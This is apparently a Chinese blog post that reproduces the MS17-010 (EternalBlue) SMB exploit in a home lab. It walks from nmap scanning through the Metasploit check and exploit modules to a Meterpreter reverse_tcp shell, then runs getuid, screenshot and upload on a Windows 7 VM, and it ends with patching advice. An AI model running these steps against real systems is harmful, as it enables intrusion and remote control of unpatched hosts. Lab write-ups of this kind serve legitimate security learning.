MS17-010永恒之蓝漏洞复现

最新推荐文章于 2025-03-04 15:00:38 发布
最新推荐文章于 2025-03-04 15:00:38 发布
阅读量96 收藏
点赞数
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/2301_77538736/article/details/132775070
版权

复现MS17-010永恒之蓝

永恒之蓝介绍

永恒之蓝漏洞(MS17-010),它的爆发源于 WannaCry 勒索病毒的诞生,该病毒是不法分子利用NSA(National Security Agency,美国国家安全局)泄露的漏洞 “EternalBlue”(永恒之蓝)进行改造而成 。勒索病毒的肆虐,俨然是一场全球性互联网灾难,给广大电脑用户造成了巨大损失。据统计,全球100多个国家和地区超过10万台电脑遭到了勒索病毒攻击、感染。
漏洞原理:

永恒之蓝漏洞通过 TCP 的445和139端口,来利用 SMBv1 和 NBT 中的远程代码执行漏洞,通过恶意代码扫描并攻击开放445文件共享端口的 Windows 主机。只要用户主机开机联网,即可通过该漏洞控制用户的主机。不法分子就能在其电脑或服务器中植入勒索病毒、窃取用户隐私、远程控制木马等恶意程序。
影响版本:

目前已知受影响的 Windows 版本包括但不限于:WindowsNT,Windows2000、Windows XP、Windows 2003、Windows Vista、Windows 7、Windows 8,Windows 2008、Windows 2008 R2、Windows Server 2012 SP0。

环境
  • 攻击机:Kali-Linux-2021 虚拟机 IP:192.168.134.128
  • 靶机:Windows7 虚拟机 IP:192.168.134.121
使用工具
  • Nmap 网络扫描工具
  • Metasploit 渗透框架,能获取、开发并对计算机软件漏洞实施攻击。它本身附带数千个已知软件漏洞的专业级漏洞攻击工具
开始复现
  • 登录管理员账号
    在这里插入图片描述
namp -T4 -A -v -Pn 192.168.134.0/24

在这里插入图片描述

  • 成功发现192.168.134.121

在这里插入图片描述

namp -T4 -A -v -Pn 192.168.134.121  //扫描此段ip开放端口

在这里插入图片描述

  • 发现445端口开放
    在这里插入图片描述

  • 通过命令启动Metasploit

msfconsole

在这里插入图片描述

  • 搜索ms17-010有关模块

在这里插入图片描述

  • exploit是攻击模块,auxiliary是辅助模块,这里我们先选用3辅助扫描模块,来确定漏洞是否存在
  • 然后查看该模块需要修改的参数
use 3
show options

在这里插入图片描述

required中yes选项是必须要填的,可以看到缺少了RHOSTS

  • 设置目标

在这里插入图片描述

  • 查看确认已更改

在这里插入图片描述

run  //运行扫描模块

在这里插入图片描述

use 0  //运行攻击模块

在这里插入图片描述

show options  //查看参数信息

在这里插入图片描述

  • 设置攻击载荷,这里默认为windows/x64/meterpreter/reverse_tcp,然后设置目标IP,攻击者IP
set payload windows/x64/meterpreter/reverse_tcp   
set rhosts 192.168.134.121         //目标机
set lhost 192.168.134.128          //攻击机

在这里插入图片描述

run  //开始攻击

在这里插入图片描述

运行成功可以开始攻击了

getuid //查看目标机权限
screenshot //拍摄一张桌面照
  • 拍摄成功并保存到了桌面1

在这里插入图片描述

  • 尝试把保存下来的照片发送到目标机
upload 本地照片位置  目标位置

在这里插入图片描述

  • 运行成功打开目标机查看,发现照片
    在这里插入图片描述
修复方法

  • 关闭bios服务,或开启防火墙,屏蔽服务端口

  • 给系统打上永恒之蓝的漏洞修复补丁

Fmmy
关注
Ms17-010永恒之蓝漏洞复现
千寻的博客
01-04 1699
Ms17-010永恒之蓝漏洞复现 0x00 漏洞介绍 永恒之蓝是指2017年4月14日晚, “永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限 2017年5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,在多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。 0x01漏洞原理 永恒之蓝漏洞是方程式组织在其漏洞利用框架中一个针对S...
ms17-010 永恒之蓝漏洞复现+抓包分析+使用mimikatz抓取密码
weixin_48710435的博客
08-05 2816
一、实验环境: 1、攻击机:KaliIP:192.168.218.157 1)攻击工具:msf 2)分析工具:wireshark 2、靶 机:Windows7(旗舰版) IP:192.168.218.160 1)开启网络共享(SMB协议) 2)关闭防火墙 3、网卡连接方式:Vmnet8(NAT) 二、实验步骤: 1、测试攻击机与靶机的连通性 2.进行MS17-010漏洞扫描 1)启动msf 命令:msfconsole ...
记一次ms17-010(永恒之蓝)漏洞复现
weixin_47830774的博客
05-13 1682
永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。
ms17-010 永恒之蓝
qq_62803993的博客
01-12 5386
什么是永恒之蓝 永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。
ms17-010永恒之蓝)渗透实战
最新发布
2301_80161123的博客
03-04 663
永恒之蓝是著名的操作系统漏洞,SMB Server远程代码执行漏洞,Microsoft Server Message Block 1.0 (SMBv1)服务器处理某些请求时,在实现上存在远程代码执行漏洞,成功利用后可使攻击者在目标服务器上执行任意代码。永恒之蓝是在Windows的SMB服务处理SMB v1 请求时发生的漏洞,这个漏洞导致攻击者在目标系统上可以执行任意代码。
Kali Linux学习篇:Metasploit渗透测试框架入门到实战
07-24
1、课程概要     本课程主要分享Kali Linux渗透测试之Metasploit Framework渗透测试框架入门学习到进阶实战全程课!2、课程目标      本课程致力于帮助广大学员掌握Metasploit渗透测试框架入门到进阶技术!
Windows下的MS17-010永恒之蓝漏洞分析与复现
dgjkkhcf的博客
07-20 1万+
永恒之蓝漏洞MS17-010),它的爆发源于 WannaCry 勒索病毒的诞生,该病毒是不法分子利用美国国家安全局泄露的漏洞 “EternalBlue”(永恒之蓝)进行改造而成 ,“永恒之蓝”是利用Windows系统的SMB漏洞来获取Windows系统的最高权限。.........
ms17-010永恒之蓝漏洞复现与处理
热门推荐
diaobusi的博客
06-05 1万+
ms17_010 是一种操作系统漏洞,仅影响 Windows 系统中的 SMBv1 服务。这个漏洞是由于 SMBv1 内核函数中的缓冲区溢出而导致的。攻击者可以通过该漏洞控制目标系统,并执行任意代码。这个漏洞通过 445 文件共享端口进行利用,一旦攻击者成功利用该漏洞,就可以在目标主机上植入各种恶意软件,如勒索软件。最近出现的 WannaCry 勒索软件就使用 ms17_010 漏洞来传播和植入勒索代码,将目标系统中的所有文件加密并威胁用户付款。
Windows 7 ms17-010永恒之蓝漏洞复现
m0_51600840的博客
07-04 2327
复现ms17-010漏洞环境:1.进入框架:msfconsole 2.使用search命令查找相关漏洞: search ms17-010 3.使用use进入模块: use exploit/windows/smb/ms17_010_eternalblue 4.设置本机地址:set lhost 192.168.238.130(输入自己本机的IP地址即kali虚拟机地址) 5. 设置靶机地址:set rhost 192.168.238.128(输入靶机的IP地址即Windows 7虚拟机地址) 注意靶机地址和攻
通过Metasploit实现MS17-010永恒之蓝漏洞)的复现学习
Time_worm的博客
07-14 1323
永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。
永恒之蓝(MS17-010)
人们并不感谢罗辑
08-06 1547
SMB协议SMB是一个协议服务器信息块,它是一个客户机/服务器,请求/响应协议,通过SMB协议可以在计算机间共享文件,命名管道等资源,电脑上网上邻居就是靠SMB实现的;
【渗透测试:MS17_010永恒之蓝漏洞复现与分析】
qq_61947585的博客
07-14 2713
永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry程序,使全世界大范围内遭受了该程序,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该程序出来不久就被微软通过打补丁修复。
MS17-010永恒之蓝漏洞复现教程
知音 の 小破站!
04-01 432
使用ms17-010漏洞扫描模块,利用它可以确定目标是否存在该漏洞。攻击机:kali 靶机:win7官方原版镜像 445端口开放。远程桌面执行研究一下,提示:远程桌面需要开启3389端口。使用screenshot截屏看看靶机当前界面看看。使用ipconfig查看靶机win7IP地址。MS17-010永恒之蓝漏洞分析与复现。使用ifconfig查看kaliIP地址。接下来我们使用漏洞利用模块来进行攻击。扫描win7查看否开启445端口。实验环境需要在同一个网段。启动msfconsle。
ms17-010-永恒之蓝漏洞
weixin_46626737的博客
07-02 98
永恒之蓝漏洞通过 TCP 的445和139端口,来利用 SMBv1 和 NBT 中的远程代码执行漏洞,通过恶意代码扫描并攻击开放445文件共享端口的 Windows 主机。只要用户主机开机联网,即可通过该漏洞控制用户的主机。不法分子就能在其电脑或服务器中植入勒索病毒、窃取用户隐私、远程控制木马等恶意程序。使用msf搜索ms17-010,选则scanner模块来判断是否有该漏洞,然后利用ms17_010_eternalblue模块来进行攻击。
浅析ms17_010永恒之蓝漏洞利用过程及防护措施
qq_24797991的博客
03-27 4699
永恒之蓝勒索病毒漏洞复现及防范
Windows下永恒之蓝MS17-010漏洞复现分析
qq_51331767的博客
01-11 2152
Windows下的MS17-010永恒之蓝)的复现与分析
漏洞复现-永恒之蓝MS17-010
qq_60848021的博客
09-19 3145
永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。
MS17-010(永恒之蓝)漏洞复现和分析
daoshiwa的博客
09-21 3670
永恒之蓝
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值